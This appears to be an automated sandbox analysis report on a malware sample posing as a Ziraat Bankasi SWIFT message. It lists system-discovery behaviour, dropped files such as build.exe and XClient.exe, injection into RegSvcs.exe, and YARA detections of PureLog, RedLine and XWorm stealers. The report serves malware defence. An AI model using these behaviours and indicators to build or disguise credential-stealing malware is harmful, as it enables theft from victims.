Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

9_2_00417A20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST5268.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST5269.tmp VolumeInformation
Source: C:\Windows\System32\msdtc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Locator.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3d95570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2a20f3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3dfb390.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
